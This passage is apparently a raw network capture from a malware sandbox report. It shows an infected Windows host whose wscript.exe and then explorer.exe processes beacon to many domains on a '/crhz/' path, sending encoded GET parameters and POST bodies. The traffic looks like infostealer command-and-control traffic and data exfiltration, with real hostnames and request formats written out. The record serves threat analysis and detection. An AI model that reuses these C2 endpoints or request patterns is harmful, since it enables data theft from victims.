                                                    Jan 30, 2023 13:41:48.208570957 CET53556298.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:42:00.644042015 CET5207953192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:42:00.805746078 CET53520798.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:42:11.471903086 CET5656953192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:42:11.616022110 CET53565698.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:42:22.355145931 CET6183353192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:42:22.387473106 CET53618338.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:42:35.543114901 CET6003253192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:42:35.570106030 CET53600328.8.8.8192.168.2.6
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 30, 2023 13:40:10.713422060 CET | 192.168.2.6 | 8.8.8.8 | cff5 | (Port unreachable) | Destination Unreachable
Jan 30, 2023 13:40:15.459065914 CET | 192.168.2.6 | 8.8.8.8 | cff5 | (Port unreachable) | Destination Unreachable
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49714 | 91.227.138.48 | 443 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49719 | 2.57.90.16 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2023 13:39:57.586954117 CET | 749 | OUT | GET /crhz/?vG=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk&s91Fd8=b8xjX_ HTTP/1.1
Host: www.laylaroseuk.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 30, 2023 13:39:57.623446941 CET | 749 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 30 Jan 2023 12:39:57 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.6 | 49731 | 184.94.215.91 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2023 13:40:47.278994083 CET | 798 | OUT | GET /crhz/?vG=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41&s91Fd8=b8xjX_ HTTP/1.1
Host: www.teammart.online
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 30, 2023 13:40:47.556508064 CET | 799 | IN | HTTP/1.1 404 Not Found
Date: Mon, 30 Jan 2023 12:40:47 GMT
Server: Apache
Content-Length: 5278
Connection: close
Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.6 | 49732 | 103.221.223.104 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 30, 2023 13:40:52.993088961 CET | 805 | OUT | POST /crhz/ HTTP/1.1
Host: www.suachuadienlanh247.com
Connection: close
Content-Length: 188
Cache-Control: no-cache
Origin: http://www.suachuadienlanh247.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.suachuadienlanh247.com/crhz/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
                                                    Data Ascii: vG=PAqkdS49ivc9LHAK5svcKHEanGqE9qICjxkrFRg-EieWkaoPJTjwu4UbDcK_d3xqV_S9nFqiJ5gv2EA8DxU6Zi3SBBuip3SaYF5smhnVF32jwsAWKXMD2KWEKdaYX_o7mS4-Jjt4jrZUUWaWf-gGoh(pwgnz4NmKMnJgS6L61U8B7uYtts6qC9E.
Jan 30, 2023 13:40:53.424937963 CET | 806 | IN | HTTP/1.1 404 Not Found
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/"
content-encoding: gzip
vary: Accept-Encoding
transfer-encoding: chunked
date: Mon, 30 Jan 2023 12:40:53 GMT
server: LiteSpeed
connection: close
                                                    Data Ascii: zj=]X+hs`Vf.3CDRRZm+NK=]j`55\>;rX@=-@fP3>Fg+ct_<`o KtG]N+E(?M:sUw,]DvYw53;_
                                                    Jan 30, 2023 13:40:53.435611963 CET812INData Raw: 37 37 31 0d 0a ec 5d dd 6f db 36 10 7f 8e ff 8a 83 8a 0e 2b 50 c9 96 2d f9 a3 b5 8d 35 dd 5a f4 a1 7b 68 ba be 0c 43 20 c7 b2 a2 56 96 04 c9 ae 93 01 fb df 77 77 fc 10 65 d9 99 1d b4 41 b1 38 45 61 5b bc 3b f2 c8 23 79 22 f9 3b ea 45 d7 b6 08 1e
                                                    Data Ascii: 771]o6+P-5Z{hC VwweA8Ea[;#y";E$EVx,ZY>6Gd|,;b,{xSt%E<Xt~Y XMW>uJKk$ehA:i+I!mx',>+/{*&y(ELr^Fc
                                                    Jan 30, 2023 13:40:53.435642958 CET812INData Raw: 3c d3 e4 10 55 27 d9 70 7a de 55 13 8a 85 a7 42 82 8c 91 35 79 9e e7 0f bb 6e d5 f7 64 02 98 65 80 1b b7 03 cb b9 4d 1f 49 c4 1f b7 3e 3f a1 0f 7c 42 1f 45 28 02 73 ed 1b 70 39 ef 79 b0 0a ec 20 8d d1 5d 64 df 77 1e be 4b ff c0 fe b9 47 2d 5d 4c
                                                    Data Ascii: <U'pzUB5yndeMI>?|BE(sp9y ]dwKG-]LSW3]vLq7Sh&hAB3wB*d .3t@B]5VOd"eqDHZOvno=6%>~#S:q-cd88
                                                    Jan 30, 2023 13:40:53.446582079 CET814INData Raw: 35 64 32 0d 0a ec 5d 4b 6f db 46 10 3e cb bf 62 a1 43 72 31 2d 4b b6 d3 3c 1d 24 4e 83 04 88 9b 20 30 d0 a3 41 4a b4 44 44 22 55 91 74 ac de 72 ee a9 c7 a0 17 3b 41 90 4b 03 04 c9 a1 80 7d e8 81 40 fe 87 fe 49 e7 b1 4f 92 92 e5 b4 40 d3 c2 07 5b
                                                    Data Ascii: 5d2]KoF>bCr1-K<$N 0AJDD"Utr;AK}@IO@[r9U]!JrG~QRD!*3OdpQ0StI))7b.jVM%14T/.E\O>Pfgd*/'#
                                                    Jan 30, 2023 13:40:53.446629047 CET814INData Raw: e5 e4 7f 5b 4d 5b a5 8c a1 a6 e0 a6 e4 c7 3e 55 73 cd 46 84 59 a5 a6 49 0e ca 13 e7 a0 4e 24 88 ab 42 63 b7 aa 7b 6f 7f 9f d0 3d cf b6 79 83 ce f6 3d 60 15 30 0d 9c 37 f8 62 99 63 43 d9 97 35 bc 61 94 66 d5 e2 e6 76 c3 f6 46 af 9e 33 9f 3b eb 9d
                                                    Data Ascii: [M[>UsFYIN$Bc{o=y=`07bcC5afvF3;zuu{oPkWem,h70|;~IT@xWW)cxk@Q[Vs>|PtE;bOpsjO)ACfPZ=~
                                                    Jan 30, 2023 13:40:53.446661949 CET815INData Raw: 32 32 37 0d 0a 04 b7 26 6a 87 26 ea 8a eb 75 a9 bd b6 9e 9c a5 08 fb 29 33 4d 2a 48 2e 02 58 d7 e4 59 d6 fa 83 82 72 8c 1d 44 47 25 28 bb aa 1b 8c d2 1d a3 a7 58 e7 e4 ce 7d 96 76 0e c8 b3 6d 49 24 04 61 26 9e 94 5b 87 c8 de 24 87 41 cc 8a 37 23
                                                    Data Ascii: 227&j&u)3M*H.XYrDG%(X}vmI$a&[$A7#.e?q(n*?@bU1,>!U1VCdkt]Wl}'w)~ R_4&~SNDtUNk?F3;z@8Q^kb$l
                                                    Jan 30, 2023 13:40:53.716959000 CET816INData Raw: 36 33 30 0d 0a ec 5d db 6e db 38 10 7d de 7e 85 b0 c5 a2 d6 42 35 44 ea ee 00 fb b8 ff 21 db ca 05 9b c4 41 ec a4 6e 8d fd f7 9d 19 ea ae a1 48 49 ce c3 02 29 d2 a2 a1 86 e7 90 c3 d1 48 e4 50 9c ce 0a e1 e1 e4 fc 8d 53 ff 69 5b c4 41 6d 93 37 89
                                                    Data Ascii: 630]n8}~B5D!AnHI)HPSi[Am7n3/nK/>}###Voj2p*h{l{9(%$KxE3P\:bKH}|s4KU)QDM7kU


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    12 | 192.168.2.6 | 49733 | 103.221.223.104 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:40:55.823978901 CET | 819 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.suachuadienlanh247.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.suachuadienlanh247.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.suachuadienlanh247.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:40:56.280698061 CET | 821 | IN | HTTP/1.1 404 Not Found
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    content-type: text/html; charset=UTF-8
                                                    link: <https://suachuadienlanh247.com/wp-json/>; rel="https://api.w.org/"
                                                    content-encoding: gzip
                                                    vary: Accept-Encoding
                                                    transfer-encoding: chunked
                                                    date: Mon, 30 Jan 2023 12:40:56 GMT
                                                    server: LiteSpeed
                                                    connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    13 | 192.168.2.6 | 49734 | 103.221.223.104 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:40:58.641371012 CET | 832 | OUT | GET /crhz/?vG=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.suachuadienlanh247.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:40:59.116734982 CET | 833 | IN | HTTP/1.1 301 Moved Permanently
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                    content-type: text/html; charset=UTF-8
                                                    x-redirect-by: WordPress
                                                    location: http://suachuadienlanh247.com/crhz/?vG=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&s91Fd8=b8xjX_
                                                    content-length: 0
                                                    date: Mon, 30 Jan 2023 12:40:58 GMT
                                                    server: LiteSpeed
                                                    connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    14 | 192.168.2.6 | 49735 | 76.223.105.230 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:04.180514097 CET | 834 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.hvlandscapes.biz
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.hvlandscapes.biz
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.hvlandscapes.biz/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:41:04.209849119 CET | 834 | IN | HTTP/1.1 301 Moved Permanently
                                                    location: http://hvlandscapes.biz/crhz/
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-0ec0b2a
                                                    x-version: 0ec0b2a
                                                    x-siteid: eu-central-1
                                                    set-cookie: dps_site_id=eu-central-1; path=/
                                                    date: Mon, 30 Jan 2023 12:41:04 GMT
                                                    keep-alive: timeout=5
                                                    transfer-encoding: chunked
                                                    connection: close
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    15 | 192.168.2.6 | 49736 | 76.223.105.230 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:06.716495991 CET | 837 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.hvlandscapes.biz
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.hvlandscapes.biz
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.hvlandscapes.biz/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:41:06.740963936 CET | 837 | IN | HTTP/1.1 301 Moved Permanently
                                                    location: http://hvlandscapes.biz/crhz/
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-0ec0b2a
                                                    x-version: 0ec0b2a
                                                    x-siteid: eu-central-1
                                                    set-cookie: dps_site_id=eu-central-1; path=/
                                                    date: Mon, 30 Jan 2023 12:41:06 GMT
                                                    keep-alive: timeout=5
                                                    transfer-encoding: chunked
                                                    connection: close
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    16 | 192.168.2.6 | 49737 | 76.223.105.230 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:09.299675941 CET | 838 | OUT | GET /crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.hvlandscapes.biz
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:41:09.326175928 CET | 839 | IN | HTTP/1.1 301 Moved Permanently
                                                    location: http://hvlandscapes.biz/crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-0ec0b2a
                                                    x-version: 0ec0b2a
                                                    x-siteid: eu-central-1
                                                    set-cookie: dps_site_id=eu-central-1; path=/
                                                    date: Mon, 30 Jan 2023 12:41:09 GMT
                                                    keep-alive: timeout=5
                                                    transfer-encoding: chunked
                                                    connection: close
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    17 | 192.168.2.6 | 49738 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:14.645462036 CET | 840 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.frogair.online
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.frogair.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.frogair.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:41:14.669533014 CET | 840 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:41:14 GMT
                                                    Server: Apache/2.4.54 (Unix)
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    18 | 192.168.2.6 | 49740 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:17.257637024 CET | 849 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.frogair.online
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.frogair.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.frogair.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:41:17.278341055 CET | 850 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:41:17 GMT
                                                    Server: Apache/2.4.54 (Unix)
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    19 | 192.168.2.6 | 49741 | 81.169.145.72 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:19.804721117 CET | 850 | OUT | GET /crhz/?vG=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.frogair.online
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:41:19.825449944 CET | 851 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:41:19 GMT
                                                    Server: Apache/2.4.54 (Unix)
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    2 | 192.168.2.6 | 49721 | 164.88.201.214 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:40:20.001878023 CET | 758 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.sandpiper-apts.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.sandpiper-apts.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.sandpiper-apts.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:40:20.210977077 CET | 759 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 30 Jan 2023 12:40:20 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    20 | 192.168.2.6 | 49742 | 163.44.198.50 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:25.720735073 CET | 853 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.mitsubangsaen.online
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.mitsubangsaen.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.mitsubangsaen.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:41:25.923171043 CET | 853 | IN | HTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:41:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    21 | 192.168.2.6 | 49743 | 163.44.198.50 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:28.446418047 CET | 855 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.mitsubangsaen.online
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.mitsubangsaen.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.mitsubangsaen.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:41:28.653239965 CET | 856 | IN | HTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:41:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    22 | 192.168.2.6 | 49744 | 163.44.198.50 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:31.198645115 CET | 856 | OUT | GET /crhz/?vG=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.mitsubangsaen.online
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:41:31.408519030 CET | 857 | IN | HTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:41:31 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    23 | 192.168.2.6 | 49745 | 208.91.197.27 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:36.735569954 CET | 858 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.hayuterce.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.hayuterce.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.hayuterce.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    24 | 192.168.2.6 | 49746 | 208.91.197.27 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:39.401545048 CET | 860 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.hayuterce.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.hayuterce.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.hayuterce.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    25 | 192.168.2.6 | 49747 | 208.91.197.27 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:42.073522091 CET | 860 | OUT | GET /crhz/?vG=qQeRCSv6osLquMzUsT5auAtcL2kpuT7TXoM3AMsXZ7zh5sUe46PrJPqpdbUyVeYEw0ooLJaeJdeynj+iQ6oazAlglr/WxPNHjeDwf7x3jgqV&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.hayuterce.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:41:43.019862890 CET | 862 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 30 Jan 2023 12:41:42 GMT
                                                    Server: Apache
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                    Set-Cookie: vsid=919vr4226281028006487; expires=Sat, 29-Jan-2028 12:41:42 GMT; Max-Age=157680000; path=/; domain=www.hayuterce.com; HttpOnly
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_W29ddwAys37fYW0hCdc1qer1ZBrVJkMdG95wpV08/PVlpHvKC7LRA5VvQcsQpj8m2QunFMhYGUqugG7HZYix/w==
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    26 | 192.168.2.6 | 49748 | 156.227.6.30 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:48.491260052 CET | 883 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.wylvxing.com
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.wylvxing.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.wylvxing.com/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:41:48.772491932 CET | 883 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 30 Jan 2023 12:41:48 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.1.33
                                                    X-Powered-By: PHP/7.1.33
                                                    Content-Length: 195
                                                    Connection: close
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Ascii: <script>if(window.location.href.includes("#")) window.location.href = window.location.href.replace(/\/\#\//g,'#').replace(/\/\#/g,'#').replace(/\#/g,'/');</script><pre>Could not parse url !</pre>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    27 | 192.168.2.6 | 49749 | 156.227.6.30 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 30, 2023 13:41:51.356923103 CET | 886 | OUT | POST /crhz/ HTTP/1.1
                                                    Host: www.wylvxing.com
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.wylvxing.com
